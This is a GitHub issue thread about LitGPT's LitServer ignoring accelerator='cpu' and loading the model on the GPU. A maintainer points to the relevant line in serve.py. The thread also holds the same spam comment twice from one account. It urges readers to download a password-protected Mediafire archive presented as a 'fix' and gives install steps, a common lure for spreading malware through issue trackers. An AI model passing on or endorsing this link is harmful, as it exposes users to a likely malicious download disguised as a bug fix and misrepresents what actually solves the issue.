### ISSUE TITLE
`accelerator` argument not working properly with `LitServer`

### ISSUE THREAD

**Issue by sovit-123** [Lightning-AI/litgpt#1704]
### Bug description

Defining `server = ls.LitServer(api, accelerator='cpu')` still loads the model on the GPU instead of the CPU. However, running through CLI using
`litgpt serve --acelerator "cpu"` loads the model on the CPU.

### What operating system are you using?

Linux

### LitGPT Version

```
Version: 0.4.11
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rasbt** [comment]
If you want to override this manually, I think you also have to change it in the line here:

https://github.com/Lightning-AI/litgpt/blob/3d36b6b26aea56317774ffb65769e74cb1d8db5a/litgpt/deploy/serve.py#L63

**Comment by sovit-123** [comment]
Thanks for the update.
